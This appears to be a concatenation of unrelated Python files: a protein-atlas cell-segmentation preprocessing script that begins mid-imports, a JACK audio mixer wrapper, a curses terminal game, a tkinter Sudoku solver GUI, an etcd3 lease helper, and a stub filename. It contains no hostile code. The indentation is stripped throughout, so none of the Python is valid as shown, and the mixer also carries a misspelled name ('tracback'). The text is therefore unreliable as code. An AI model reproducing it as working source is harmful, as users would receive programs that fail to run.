from hpacellseg.cellsegmentator import NORMALIZE
from tqdm import tqdm
from hpa.label_cell import label_cell_with_resized_pred
from hpa.reading import read_cellseg_input, read_gray
from somen.pfio_utility import DirectoryInZip, setup_forkserver
def _cv2_imwrite(directory: DirectoryInZip, path: str, image: np.ndarray) -> None:
with tempfile.NamedTemporaryFile(mode="wb", suffix=".png") as tmp_fp:
cv2.imwrite(tmp_fp.name, image)
with open(tmp_fp.name, "rb") as read_fp, directory.open(path, mode="wb") as write_fp:
write_fp.write(read_fp.read())
def _segmentation_worker(
in_queue: Queue, out_queue: Queue, input_directory: str, nuc_model: str, cell_model: str, batch_size: int
) -> None:
input_directory = DirectoryInZip(input_directory)
device = "cuda"
segmentator = cellsegmentator.CellSegmentator(
nuc_model,
cell_model,
scale_factor=0.25,
device=device,
padding=False,
multi_channel_model=True,
)
MEAN = torch.tensor(NORMALIZE["mean"], device=device)[np.newaxis, :, np.newaxis, np.newaxis]
STD = torch.tensor(NORMALIZE["std"], device=device)[np.newaxis, :, np.newaxis, np.newaxis]
done = False
while not done:
image_ids = []
while len(image_ids) < batch_size:
image_id = in_queue.get()
if image_id is None:
done = True
break
image_ids.append(image_id)
if len(image_ids) == 0:
continue
uint_images = [read_cellseg_input(input_directory, image_id) for image_id in image_ids]
shapes = [image.shape[:2] for image in uint_images]
images = torch.tensor(
[np.moveaxis(skimage.transform.resize(image, (512, 512)), 2, 0) for image in uint_images],
device=device,
dtype=torch.float32,
)
images = (images - MEAN) / STD
with torch.no_grad():
nuc_seg = F.softmax(segmentator.nuclei_model(images[:, [2, 2, 2]]), dim=1)
nuc_seg[:, 0] = 0
nuc_seg = nuc_seg.detach().cpu().numpy()
nuc_seg = np.rint((nuc_seg * 255)).clip(0, 255).astype(np.uint8)
nuc_seg = np.moveaxis(nuc_seg, 1, 3)
cell_seg = F.softmax(segmentator.cell_model(images), dim=1)
cell_seg[:, 0] = 0
cell_seg = cell_seg.detach().cpu().numpy()
# For some unknown reason, restore_scaling_padding -> img_as_ubyte is applied to cell_seg,
# so we don't convert it to int here
cell_seg = np.moveaxis(cell_seg, 1, 3)
for i, image_id in enumerate(image_ids):
out_queue.put((image_id, cell_seg[i], nuc_seg[i], shapes[i]))
def _postprocess_worker(in_queue: Queue, out_queue: Queue, label_cell_scale_factor: float) -> None:
while True:
msg = in_queue.get()
if msg is None:
break
image_id, cell_seg, nuc_seg, orig_shape = msg
# If the resolution is too small, the result will be quite different due to integer round errors
# of `disk` in the label_cell, so make it larger than that when putting it into the segmentator.
image_size = int(2048 * label_cell_scale_factor)
cell_seg = cv2.resize(cell_seg, (image_size, image_size), interpolation=cv2.INTER_AREA)
cell_seg = np.rint((cell_seg * 255)).clip(0, 255).astype(np.uint8)
nuc_seg = cv2.resize(nuc_seg, (image_size, image_size), interpolation=cv2.INTER_AREA)
_, cell_mask = label_cell_with_resized_pred(nuc_seg, cell_seg, label_cell_scale_factor)
assert 0 <= cell_mask.min() and cell_mask.max() <= 255
cell_mask = cell_mask.astype(np.uint8)
cell_mask = cv2.resize(cell_mask, orig_shape, interpolation=cv2.INTER_NEAREST_EXACT)
out_queue.put((image_id, cell_mask))
def create_cell_mask(
input_directory: str,
output_directory: str,
batch_size: int = 16,
num_segmentation_workers: int = 1,
num_postprocess_workers: int = 16,
label_cell_scale_factor: float = 1.0,
nuc_model: str = "../nuclei-model.pth",
cell_model: str = "../cell-model.pth",
) -> None:
input_directory = DirectoryInZip(input_directory)
output_directory = DirectoryInZip(output_directory)
image_id_queue, seg_queue, mask_queue = Queue(), Queue(maxsize=batch_size), Queue()
image_ids = np.unique(["_".join(filename.split("_")[:-1]) for filename in input_directory.listdir()])
image_ids = sorted(image_ids)
for image_id in image_ids:
image_id_queue.put(image_id)
segmentation_workers = []
for _ in range(num_segmentation_workers):
p = Process(
target=_segmentation_worker,
args=(image_id_queue, seg_queue, str(input_directory), nuc_model, cell_model, batch_size),
)
p.start()
segmentation_workers.append(p)
image_id_queue.put(None)
postprocess_workers = []
for _ in range(num_postprocess_workers):
p = Process(target=_postprocess_worker, args=(seg_queue, mask_queue, label_cell_scale_factor))
p.start()
postprocess_workers.append(p)
done_segmentation, done_postprocess = False, False
pbar = tqdm(total=len(image_ids))
while True:
try:
image_id, cell_mask = mask_queue.get_nowait()
_cv2_imwrite(output_directory, f"{image_id}.png", cell_mask)
pbar.update(1)
continue
except Empty:
pass
time.sleep(5)
if not done_segmentation:
if all([not p.is_alive() for p in segmentation_workers]):
done_segmentation = True
for _ in postprocess_workers:
seg_queue.put(None)
elif not done_postprocess:
if all([not p.is_alive() for p in postprocess_workers]):
done_postprocess = True
else:
assert done_segmentation and done_postprocess
break
pbar.close()
def resize_cell_mask(input_directory: str, output_directory: str, image_size: int) -> None:
input_directory = DirectoryInZip(input_directory)
output_directory = DirectoryInZip(output_directory)
for path in tqdm(sorted(input_directory.listdir())):
cell_mask = read_gray(input_directory, path)
cell_mask = cv2.resize(cell_mask, (image_size, image_size), interpolation=cv2.INTER_NEAREST_EXACT)
_cv2_imwrite(output_directory, path, cell_mask)
def resize_image(input_directory: str, output_directory: str, image_size: int) -> None:
input_directory = DirectoryInZip(input_directory)
output_directory = DirectoryInZip(output_directory)
for path in tqdm(sorted(input_directory.listdir())):
img = read_gray(input_directory, path)
img = cv2.resize(img, (image_size, image_size))
_cv2_imwrite(output_directory, path, img)
def _crop_and_resize_cell_worker(
image_directory: str,
cell_mask_directory: str,
image_size: int,
in_queue: Queue,
out_queue: Queue,
) -> Sequence[int]:
image_directory = DirectoryInZip(image_directory)
cell_mask_directory = DirectoryInZip(cell_mask_directory)
while True:
msg = in_queue.get()
if msg is None:
break
image_id = msg
cell_mask = read_gray(cell_mask_directory, f"{image_id}.png")
assert cell_mask.ndim == 2
if (cell_mask == 0).all():
out_queue.put((image_id, None, []))
continue
cell_images = []
instance_indices = []
for instance_index in range(1, cell_mask.max() + 1):
instance_mask = cell_mask == instance_index
ys, xs = np.where(instance_mask)
if len(ys) == 0:
continue
instance_indices.append(instance_index)
whole_slice_y = slice(ys.min(), ys.max() + 1)
whole_slice_x = slice(xs.min(), xs.max() + 1)
images = {}
for color in ["red", "green", "blue", "yellow"]:
image = read_gray(image_directory, f"{image_id}_{color}.png")
assert image.shape == cell_mask.shape
images[color] = image
weight = images["blue"][ys, xs]
weight = weight / (weight.sum() + 1e-6)
center_y = int((weight * ys).sum())
center_x = int((weight * xs).sum())
# Crop around nuclei without resizing (not necessarily the whole cell)
def _get_nuclei_center_crop(src: np.ndarray) -> np.ndarray:
dst_y_start = 0
src_y_start = center_y - image_size // 2 + 1
if src_y_start < 0:
dst_y_start = -src_y_start
src_y_start = 0
dst_x_start = 0
src_x_start = center_x - image_size // 2 + 1
if src_x_start < 0:
dst_x_start = -src_x_start
src_x_start = 0
dst_y_end = image_size
src_y_end = center_y + image_size // 2 + 1
if src_y_end >= cell_mask.shape[0]:
dst_y_end = image_size - (src_y_end - cell_mask.shape[0])
src_y_end = cell_mask.shape[0]
dst_x_end = image_size
src_x_end = center_x + image_size // 2 + 1
if src_x_end >= cell_mask.shape[1]:
dst_x_end = image_size - (src_x_end - cell_mask.shape[1])
src_x_end = cell_mask.shape[1]
dst = np.zeros((image_size, image_size), dtype=src.dtype)
dst[dst_y_start:dst_y_end, dst_x_start:dst_x_end] = src[src_y_start:src_y_end, src_x_start:src_x_end]
return dst
# Crop whole cell with resizing
def _get_resized_whole_crop(src: np.ndarray) -> np.ndarray:
whole_crop = src[whole_slice_y, whole_slice_x]
h, w = whole_crop.shape
ratio = image_size / max(h, w)
h_new, w_new = int(h * ratio), int(w * ratio)
assert h_new <= image_size and w_new <= image_size
resized = np.zeros((image_size, image_size), dtype=image.dtype)
y_start = (image_size - h_new) // 2
x_start = (image_size - w_new) // 2
# NOTE: cv2.resize uses it in (x, y) order, so it becomes (w_new, h_new)
resized[y_start : y_start + h_new, x_start : x_start + w_new] = cv2.resize(whole_crop, (w_new, h_new))
return resized
for color in ["red", "green", "blue", "yellow"]:
image = images[color]
image = image * instance_mask
nuclei_center_crop = _get_nuclei_center_crop(image)
resized_whole_crop = _get_resized_whole_crop(image)
cell_images.append(nuclei_center_crop)
cell_images.append(resized_whole_crop)
cell_images = np.asarray(cell_images).reshape(-1, 4 * 2, image_size, image_size)
# Pack to save time in serialize (not sure how effective it is)
out_queue.put((image_id, blosc.pack_array(cell_images), instance_indices))
def crop_and_resize_cell(
image_directory: str, cell_mask_directory: str, output_directory: str, image_size: int, num_workers: int = 2
) -> None:
image_directory = DirectoryInZip(image_directory)
cell_mask_directory = DirectoryInZip(cell_mask_directory)
output_directory = DirectoryInZip(output_directory)
image_ids = np.unique([filename[: filename.rindex("_")] for filename in image_directory.listdir()])
image_ids = sorted(image_ids)
in_queue, out_queue = Queue(), Queue(maxsize=128)
for image_id in image_ids:
in_queue.put(image_id)
for _ in range(num_workers):
in_queue.put(None)
workers = []
for _ in range(num_workers):
p = Process(
target=_crop_and_resize_cell_worker,
args=(str(image_directory), str(cell_mask_directory), image_size, in_queue, out_queue),
)
p.start()
workers.append(p)
done = False
instance_indices_by_id = {}
pbar = tqdm(total=len(image_ids))
while True:
try:
image_id, cell_images, instance_indices = out_queue.get_nowait()
if len(instance_indices) > 0:
assert cell_images is not None
cell_images = blosc.unpack_array(cell_images)
assert len(instance_indices) == cell_images.shape[0]
for i, instance_index in enumerate(instance_indices):
with output_directory.open(f"{image_id}_{instance_index}.blosc", mode="wb") as fp:
fp.write(blosc.pack_array(cell_images[i]))
instance_indices_by_id[image_id] = instance_indices
pbar.update(1)
continue
except Empty:
pass
time.sleep(1)
if not done:
if all([not p.is_alive() for p in workers]):
done = True
# Don't break, run the while loop again until get_nowait fails
else:
break
pbar.close()
with output_directory.open("instance_indices_by_id.pkl", "wb") as fp:
pickle.dump(instance_indices_by_id, fp, pickle.HIGHEST_PROTOCOL)
if __name__ == "__main__":
setup_forkserver()
fire.Fire(
{
"create_cell_mask": create_cell_mask,
"resize_cell_mask": resize_cell_mask,
"resize_image": resize_image,
"crop_and_resize_cell": crop_and_resize_cell,
}
)
|
mixer.py
|
import threading
import traceback
import subprocess
import socket
import time
from . import base
import math
class Mixer(base.Object):
def __init__(self, name, gain=1.0):
self.name = name
self.gain = self.calc_gain(gain)
self.in_ports = []
self.in_ports.append("%s:in_left" % self.name)
self.in_ports.append("%s:in_right" % self.name)
self.out_ports = []
self.out_ports.append("%s:out_left" % self.name)
self.out_ports.append("%s:out_right" % self.name)
base.Object.__init__(self)
def run(self):
def target():
while self.running:
try:
self.process = subprocess.Popen(["/opt/jackie/bin/jacknanomix", "-n", self.name], stdin=subprocess.PIPE)
self.process.stdin.write(b"%.2f\n" % self.gain)
self.process.stdin.flush()
self.process.wait()
self.status = self.process.returncode
except:
tracback.print_exc()
self.error = "exception"
self.status = -1
if self.running:
time.sleep(5)
self.thread = threading.Thread(target=target)
self.thread.start()
def calc_gain(self, gain):
return (math.exp((math.exp(gain)-1) / (math.e - 1))-1) / (math.e - 1)
# return (math.exp(gain)-1) / (math.e - 1)
def set_gain(self, gain):
self.gain = self.calc_gain(gain)
self.process.stdin.write(b"%.2f\n" % self.gain)
self.process.stdin.flush()
def stop(self):
self.running = False
if self.thread.is_alive():
self.process.terminate()
self.process.kill()
self.thread.join()
return self.status
|
main.py
|
import curses
import random
import argparse
import time
import threading
import sys
# ---------------------------------------
# Initialize Variables and Strings
# ---------------------------------------
# Dropping Speed
SPEED = [1, 0.8 ,0.6 ,0.4, 0.2, 0.1, 0.07, 0.05, 0.03, 0.01]
def init():
global obstacles_list, ship_location, status_bar_str, args, difficulty, end_flag, score
args = set_argument()
obstacles_list = []
# True If Game Over
end_flag = False
score = 0
ship_location = args.width // 2
difficulty = SPEED[args.difficulty-1]
status_bar_str = "Press 'q' to exit | Size: " + str(args.width) + "x" + str(args.height) + " | Difficulty: " + str(args.difficulty) + " | Score: "
# Command-Line Argument Parse
def set_argument():
parser = argparse.ArgumentParser(
description="Playing Spaceship Dodging Game in Terminal!",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument("--height", action='store', default=24, type=height_type, help="Set the height of the screen [height > 7]")
parser.add_argument("--width", action='store', default=80, type=width_type, help="Set the width of the screen")
parser.add_argument("--difficulty", action='store', default=1, type=difficulty_type, help="Set the difficulty[1-10] of the game, increase the speed of dropping obstacles")
return parser.parse_args()
# Customize Type Function
def height_type(x):
x = int(x)
if x < 7:
raise argparse.ArgumentTypeError("Height must greater than 7 [height > 7]")
return x
def width_type(x):
x = int(x)
if x < 65:
raise argparse.ArgumentTypeError("width must greater than 65 [width > 65]")
return x
def difficulty_type(x):
x = int(x)
if x < 1 or x > 10:
raise argparse.ArgumentTypeError("Difficulty must between [1-10]")
return x
# ---------------------------------------
# ---------------------------------------
# Render Functions
# ---------------------------------------
# Render Information When Game End
def render_end_game(stdscr, rows, cols):
global score, end_flag
# Hit Warning
stdscr.attron(curses.color_pair(2))
stdscr.addch(rows-2, ship_location, "*")
stdscr.addch(rows-3, ship_location, "X")
stdscr.attroff(curses.color_pair(2))
# Middle Information Window
str_1 = " GAME OVER! "
str_2 = " Your Score: " + str(score) + " "
str_3 = " Press 'q' to exit, 'r' to restart "
_y = int((rows // 2) - 2)
_x_1 = int((cols // 2) - (len(str_1) // 2) - len(str_1) % 2)
_x_2 = int((cols // 2) - (len(str_2) // 2) - len(str_2) % 2)
_x_3 = int((cols // 2) - (len(str_3) // 2) - len(str_3) % 2)
for i in range(-1, 4):
for j in range( (_x_3-2), (_x_3-2) + len(str_3) + 4):
stdscr.addch(_y + i, j , "/")
stdscr.attron(curses.color_pair(1))
stdscr.addstr(_y , _x_1 , str_1)
stdscr.addstr(_y + 1, _x_2 , str_2)
stdscr.addstr(_y + 2, _x_3 , str_3)
stdscr.attroff(curses.color_pair(1))
stdscr.refresh()
# Key Event
while True:
key = stdscr.getch()
if key == ord('q'):
curses.endwin()
sys.exit()
elif key == ord('r'):
init()
return
# Render Status Bar on the Bottom
def render_status_bar(stdscr, rows, cols):
global status_bar_str, score
stdscr.attron(curses.color_pair(3))
stdscr.addstr(rows-1, 0, status_bar_str + str(score))
stdscr.addstr(rows-1, len(status_bar_str + str(score)), " " * (cols - len(status_bar_str + str(score)) - 1))
stdscr.attroff(curses.color_pair(3))
# Main Render Function
def rendering(stdscr):
global obstacles_list, ship_location, end_flag
rows, cols = stdscr.getmaxyx()
if end_flag:
render_end_game(stdscr, rows, cols)
else:
stdscr.erase()
# Render Scene
index = 0
for i in reversed(obstacles_list):
for j in i:
stdscr.addch(index, j, "-")
index += 1
stdscr.addch(rows - 2, ship_location, "*")
render_status_bar(stdscr, rows, cols)
stdscr.refresh()
# ---------------------------------------
# ---------------------------------------
# Thread Target Function
# ---------------------------------------
def update_obstacles():
global obstacles_list, ship_location, end_flag, score, args, difficulty
while True:
# Generate Obstacle
obstacles = random.sample(range(0, args.width), 5)
if len(obstacles_list) >= args.height-2:
target = obstacles_list[0]
obstacles_list.pop(0)
score += args.difficulty
if ship_location in target:
end_flag = True
obstacles_list.append(obstacles)
# Dropping Speed
time.sleep(difficulty)
# ---------------------------------------
# ---------------------------------------
# Main Scene(screen/curses) Function
# ---------------------------------------
def run(stdscr):
global ship_location, args
# Scene Initialize & Setting
stdscr = curses.initscr()
stdscr.resize(args.height, args.width)
stdscr.nodelay(True)
curses.curs_set(0)
curses.noecho()
curses.start_color()
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_BLACK, curses.COLOR_WHITE)
th_update.start()
while True:
# Render Starting
rendering(stdscr)
# FPS
time.sleep(0.001)
# Key event
key = stdscr.getch()
if key == ord('q'):
break
elif key == curses.KEY_LEFT:
if(ship_location > 0):
ship_location -= 1
elif key == curses.KEY_RIGHT:
if(ship_location < args.width-1):
ship_location += 1
else:
pass
curses.endwin()
# ---------------------------------------
if __name__ == '__main__':
init()
# Obstacle dropping thread
th_update = threading.Thread(target=update_obstacles, daemon=True)
curses.wrapper(run)
|
gui.py
|
from tkinter import *
from timeit import default_timer as timer
from tkinter import messagebox
import threading
import copy
from sudokucsp import SudokuCSP
# if you want to verify that my csp.py does a better job just change
# from csp import ... to from original import ... , original is the csp.py file from AIMA code
from csp import backtracking_search, mrv, unordered_domain_values, forward_checking, mac, no_inference
MARGIN = 20 # Pixels around the board
SIDE = 50 # Width of every board cell
WIDTH_B = HEIGHT_B = MARGIN * 2 + SIDE * 9 # Width and height of the whole board
WIDTH = WIDTH_B + 180 # Width of board and buttons solve and reset
class SudokuUI(Frame):
def __init__(self, parent):
self.parent = parent
# we start with a blank board
self.original_board = [[0 for j in range(9)] for i in range(9)]
# ofc we should have another board in which we will show solution
self.current_board = copy.deepcopy(self.original_board)
Frame.__init__(self, parent)
self.row, self.col = 0, 0
self.__initUI()
def __initUI(self):
# we will initializate stuff that will be shown in the gui
self.pack(fill=BOTH, expand=1)
self.canvas = Canvas(self, width=WIDTH_B, height=HEIGHT_B)
self.canvas.pack(fill=BOTH, side=TOP)
self.canvas.grid(row=0, column=0, rowspan=30, columnspan=60)
# level will be used to select the lvl of the board, 1 means easy and 2 hard
self.level = IntVar(value=1)
# which will be used to select which board at which lvl, there are 3 for each level
self.which = 0
# we will need a StringVar so that the client can see the time used by an algorithm
self.time = StringVar()
self.time.set("Time: ")
# same for number of backtracks
self.n_bt = StringVar()
self.n_bt.set("N. BT: ")
self.make_menu()
# the default will be the board of lvl 1 and which 1
self.__change_level()
self.clear_button = Button(self, text="Reset", command=self.__clear_board, width=15, height=5)
self.clear_button.grid(row=10, column=61, padx=20, columnspan=3)
self.solve_button = Button(self, text="Solve", command=self.solve_clicked, width=15, height=5)
self.solve_button.grid(row=13, column=61, padx=20, columnspan=3)
lbltime = Label(self, textvariable=self.time)
lblBT = Label(self, textvariable=self.n_bt)
Label(self, text="Inference: ").grid(row=14, column=61)
lbltime.grid(row=30, column=0)
lblBT.grid(row=32, column=0)
self.inference = StringVar()
self.radio = []
self.radio.append(Radiobutton(self, text="No Inference", variable=self.inference, value="NO_INFERENCE"))
self.radio[0].grid(row=15, column=62, padx=2)
self.radio.append(Radiobutton(self, text="FC ", variable=self.inference, value="FC"))
self.radio[1].grid(row=16, column=62)
self.radio.append(Radiobutton(self, text="MAC ", variable=self.inference, value="MAC"))
self.radio[2].grid(row=17, column=62)
self.inference.set("NO_INFERENCE")
Label(self, text="Variable to choose:").grid(row=18, column=61)
lbltime.grid(row=30, column=0)
lblBT.grid(row=32, column=0)
self.var_to_choose = StringVar()
self.radio.append(Radiobutton(self, text="MRV", variable=self.var_to_choose, value="MRV"))
self.radio[3].grid(row=20, column=62)
self.var_to_choose.set("MRV")
self.__draw_grid()
self.__draw_puzzle()
def solve_clicked(self):
# we are searching for a solution so it is good to disable buttons
for rb in self.radio:
rb.config(state=DISABLED)
self.clear_button.config(state=DISABLED)
self.solve_button.config(state=DISABLED)
self.menu_bar.entryconfig("Level", state="disabled")
p = threading.Thread(target=self.solve_sudoku)
p.start()
messagebox.showinfo("Working", "We are looking for a solution, please wait some seconds ...")
def solve_sudoku(self):
s = SudokuCSP(self.current_board)
inf, dv, suv = None, None, None
if self.inference.get() == "NO_INFERENCE":
inf = no_inference
elif self.inference.get() == "FC":
inf = forward_checking
elif self.inference.get() == "MAC":
inf = mac
if self.var_to_choose.get() == "MRV":
suv = mrv
start = timer()
a = backtracking_search(s, select_unassigned_variable=suv, order_domain_values=unordered_domain_values,
inference=inf)
end = timer()
# if a isn't null we found a solution so we will show it in the current board
# if a is null then we send a message to the user that the initial board
# breaks some constraints
if a:
for i in range(9):
for j in range(9):
index = i * 9 + j
self.current_board[i][j] = a.get("CELL" + str(index))
else:
messagebox.showerror("Error", "Invalid sudoku puzzle, please check the initial state")
# showing solution
self.__draw_puzzle()
self.time.set("Time: "+str(round(end-start, 5))+" seconds")
self.n_bt.set("N. BR: "+str(s.n_bt))
# re-enabling buttons for search a new solution
for rb in self.radio:
rb.config(state=NORMAL)
self.clear_button.config(state=NORMAL)
self.solve_button.config(state=NORMAL)
self.menu_bar.entryconfig("Level", state="normal")
def make_menu(self):
# creating menu with level Easy and Hard
self.menu_bar = Menu(self.parent)
self.parent.configure(menu=self.menu_bar)
level_menu = Menu(self.menu_bar, tearoff=False)
self.menu_bar.add_cascade(label="Level", menu=level_menu)
level_menu.add_radiobutton(label="Easy", variable=self.level, value=1, command=self.__change_level)
level_menu.add_radiobutton(label="Hard", variable=self.level, value=2, command=self.__change_level)
def __change_level(self):
# to add a new board, you just have to change %3 to %4 and then add another
# clause elif like "elif self.which == 3:"
self.which = (self.which+1) % 3
if self.level.get() == 1:
if self.which == 0:
self.original_board[0] = [0, 6, 0, 3, 0, 0, 8, 0, 4]
self.original_board[1] = [5, 3, 7, 0, 9, 0, 0, 0, 0]
self.original_board[2] = [0, 4, 0, 0, 0, 6, 0, 0, 7]
self.original_board[3] = [0, 9, 0, 0, 5, 0, 0, 0, 0]
self.original_board[4] = [0, 0, 0, 0, 0, 0, 0, 0, 0]
self.original_board[5] = [7, 1, 3, 0, 2, 0, 0, 4, 0]
self.original_board[6] = [3, 0, 6, 4, 0, 0, 0, 1, 0]
self.original_board[7] = [0, 0, 0, 0, 6, 0, 5, 2, 3]
self.original_board[8] = [1, 0, 2, 0, 0, 9, 0, 8, 0]
elif self.which == 1:
self.original_board[0] = [7, 9, 0, 4, 0, 2, 3, 8, 1]
self.original_board[1] = [5, 0, 3, 0, 0, 0, 9, 0, 0]
self.original_board[2] = [0, 0, 0, 0, 3, 0, 0, 7, 0]
self.original_board[3] = [0, 0, 0, 0, 0, 5, 0, 0, 2]
self.original_board[4] = [9, 2, 0, 8, 1, 0, 7, 0, 0]
self.original_board[5] = [4, 6, 0, 0, 0, 0, 5, 1, 9]
self.original_board[6] = [0, 1, 0, 0, 0, 0, 2, 3, 8]
self.original_board[7] = [8, 0, 0, 0, 4, 1, 0, 0, 0]
self.original_board[8] = [0, 0, 9, 0, 8, 0, 1, 0, 4]
elif self.which == 2:
self.original_board[0] = [0, 3, 0, 5, 0, 6, 2, 0, 0]
self.original_board[1] = [8, 2, 0, 0, 0, 1, 0, 0, 4]
self.original_board[2] = [6, 0, 7, 8, 3, 0, 0, 9, 1]
self.original_board[3] = [0, 0, 0, 0, 0, 0, 0, 2, 9]
self.original_board[4] = [5, 0, 0, 6, 0, 7, 0, 0, 3]
self.original_board[5] = [3, 9, 0, 0, 0, 0, 0, 0, 0]
self.original_board[6] = [4, 5, 0, 0, 8, 9, 1, 0, 2]
self.original_board[7] = [9, 0, 0, 1, 0, 0, 0, 4, 6]
self.original_board[8] = [0, 0, 3, 7, 0, 4, 0, 5, 0]
elif self.level.get() == 2:
if self.which == 0:
self.original_board[0] = [8, 0, 0, 0, 0, 0, 0, 0, 0]
self.original_board[1] = [0, 0, 3, 6, 0, 0, 0, 0, 0]
self.original_board[2] = [0, 7, 0, 0, 9, 0, 2, 0, 0]
self.original_board[3] = [0, 5, 0, 0, 0, 7, 0, 0, 0]
self.original_board[4] = [0, 0, 0, 0, 4, 5, 7, 0, 0]
self.original_board[5] = [0, 0, 0, 1, 0, 0, 0, 3, 0]
self.original_board[6] = [0, 0, 1, 0, 0, 0, 0, 6, 8]
self.original_board[7] = [0, 0, 8, 5, 0, 0, 0, 1, 0]
self.original_board[8] = [0, 9, 0, 0, 0, 0, 4, 0, 0]
elif self.which == 1:
self.original_board[0] = [2, 0, 0, 0, 0, 0, 0, 4, 3]
self.original_board[1] = [1, 9, 0, 0, 3, 0, 0, 0, 0]
self.original_board[2] = [0, 6, 0, 0, 0, 5, 0, 0, 0]
self.original_board[3] = [0, 5, 0, 2, 6, 0, 0, 0, 8]
self.original_board[4] = [0, 0, 0, 0, 7, 0, 0, 0, 0]
self.original_board[5] = [6, 0, 0, 0, 5, 3, 0, 1, 0]
self.original_board[6] = [0, 0, 0, 6, 0, 0, 0, 2, 0]
self.original_board[7] = [0, 0, 0, 0, 8, 0, 0, 3, 4]
self.original_board[8] = [9, 1, 0, 0, 0, 0, 0, 0, 6]
elif self.which == 2:
self.original_board[0] = [0, 0, 0, 0, 2, 0, 0, 0, 5]
self.original_board[1] = [0, 0, 1, 6, 0, 0, 0, 0, 0]
self.original_board[2] = [0, 6, 0, 7, 0, 0, 0, 8, 1]
self.original_board[3] = [0, 0, 0, 3, 0, 0, 5, 0, 0]
self.original_board[4] = [3, 0, 8, 5, 0, 6, 2, 0, 9]
self.original_board[5] = [0, 0, 4, 0, 0, 7, 0, 0, 0]
self.original_board[6] = [7, 4, 0, 0, 0, 9, 0, 1, 0]
self.original_board[7] = [0, 0, 0, 0, 0, 5, 9, 0, 0]
self.original_board[8] = [8, 0, 0, 0, 7, 0, 0, 0, 0]
self.current_board = copy.deepcopy(self.original_board)
self.__draw_puzzle()
def __draw_grid(self):
for i in range(10):
if i % 3 == 0:
color = "black"
else:
color = "gray"
x0 = MARGIN + i * SIDE
y0 = MARGIN
x1 = MARGIN + i * SIDE
y1 = HEIGHT_B - MARGIN
self.canvas.create_line(x0, y0, x1, y1, fill=color)
x0 = MARGIN
y0 = MARGIN + i * SIDE
x1 = WIDTH_B - MARGIN
y1 = MARGIN + i * SIDE
self.canvas.create_line(x0, y0, x1, y1, fill=color)
def __draw_puzzle(self):
self.canvas.delete("numbers")
self.time.set("Time: ")
self.n_bt.set("N. BT: ")
for i in range(9):
for j in range(9):
cell = self.current_board[i][j]
if cell != 0:
x = MARGIN + j * SIDE + SIDE / 2
y = MARGIN + i * SIDE + SIDE / 2
if str(cell) == str(self.original_board[i][j]):
self.canvas.create_text(x, y, text=cell, tags="numbers", fill="black")
else:
self.canvas.create_text(x, y, text=cell, tags="numbers", fill="red")
def __clear_board(self):
self.current_board = copy.deepcopy(self.original_board)
self.__draw_puzzle()
|
lease.py
|
"""
Sync lease util
"""
import sys
import threading
import time
from ..errors import ErrLeaseNotFound
from ..utils import log
from ..utils import retry
class Lease(object):
def __init__(self, client, ttl, ID=0, new=True):
"""
:type client: BaseClient
:param client: client instance of etcd3
:type ID: int
:param ID: ID is the requested ID for the lease. If ID is set to 0, the lessor chooses an ID.
:type new: bool
:param new: whether grant a new lease or maintain a exist lease by its id [default: True]
"""
self.client = client
if ttl < 2:
ttl = 2
self.grantedTTL = ttl
if not new and not ID:
raise TypeError("should provide the lease ID if new=False")
self._ID = ID
self.new = new
self.last_grant = None
self.keeping = False
self.last_keep = None
self._keepalive_error = None
self._keepalive_exc_info = None
self._keepalive_keep_cb_error = None
self._keepalive_keep_cb_exc_info = None
self._keepalive_cancel_cb_error = None
self._keepalive_cancel_cb_exc_info = None
self._thread = None
self._lock = threading.Condition()
@property
def ID(self):
"""
Property: the id of the granted lease
:return: int
"""
return self._ID
def grant(self):
"""
Grant the lease if new is set to False
or it just inherit the lease of the specified id
When granting new lease if ID is set to 0, the lessor will chooses an ID.
"""
if self.new:
r = self.client.lease_grant(self.grantedTTL, self.ID)
self.last_grant = time.time()
self._ID = r.ID
return r
else:
r = self.time_to_live()
if 'TTL' not in r:
ttl = -1
else:
ttl = r.TTL
if ttl == -1:
raise ErrLeaseNotFound
self.last_grant = time.time() - ttl
return r
def time_to_live(self, keys=False):
"""
Retrieves lease information.
:type keys: bool
:param keys: whether return the keys that attached to the lease
"""
return self.client.lease_time_to_live(self.ID, keys=keys)
def ttl(self):
"""
Get the ttl that lease has left
:return: int
"""
r = self.time_to_live()
if 'TTL' not in r:
return -1
return r.TTL
def alive(self):
"""
Tell if the lease is still alive
:return: bool
"""
return self.ttl() > 0
def keepalive_once(self):
"""
Call keepalive for once to refresh the ttl of the lease
"""
return self.client.lease_keep_alive_once(self.ID)
refresh = keepalive_once
def keepalive(self, keep_cb=None, cancel_cb=None):
"""
Start a daemon thread to constantly keep the lease alive
:type keep_cb: callable
:param keep_cb: callback function that will be called after every refresh
:type cancel_cb: callable
:param cancel_cb: callback function that will be called after cancel keepalive
"""
if self.keeping:
raise RuntimeError("already keeping")
self.keeping = True
self._keepalive_error = None
self._keepalive_exc_info = None
def keepalived():
try:
with self._lock:
while self.keeping:
retry(self.keepalive_once, max_tries=3, log=log)
self.last_keep = time.time()
log.debug("keeping lease %d" % self.ID)
if keep_cb:
try:
keep_cb()
except Exception as e:
log.exception("keep_cb() raised an error")
self._keepalive_keep_cb_error = e
self._keepalive_keep_cb_exc_info = sys.exc_info()
for _ in range(int(self.grantedTTL / 2.0)): # keep per grantedTTL/4 seconds
if not self.keeping:
break
self._lock.wait(0.5)
log.debug("canceled keeping lease %d" % self.ID)
if cancel_cb:
try:
cancel_cb()
except Exception as e:
log.exception("cancel_cb() raised an error")
self._keepalive_cancel_cb_error = e
self._keepalive_cancel_cb_exc_info = e
except Exception as e:
log.exception('error occurred while keeping alive lease')
self._keepalive_error = e
self._keepalive_exc_info = sys.exc_info()
t = self._thread = threading.Thread(target=keepalived)
t.setDaemon(True)
t.start()
def cancel_keepalive(self, join=True):
"""
stop keeping-alive
:type join: bool
:param join: whether to wait the keepalive thread to exit
"""
self.keeping = False
with self._lock:
self._lock.notify_all()
if join and self._thread and self._thread.is_alive():
self._thread.join()
def jammed(self):
"""
if is failed to keepalive at the last loop
"""
if not self.keeping:
return False
return time.time() - self.last_keep > self.grantedTTL / 4.0
def revoke(self):
"""
revoke the lease
"""
log.debug("revoking lease %d" % self.ID)
self.cancel_keepalive(False)
return self.client.lease_revoke(self.ID)
def __enter__(self):
self.grant()
self.keepalive()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.cancel_keepalive()
self.revoke()
|
collect_data_files.py
|
#!/usr/bin/env python
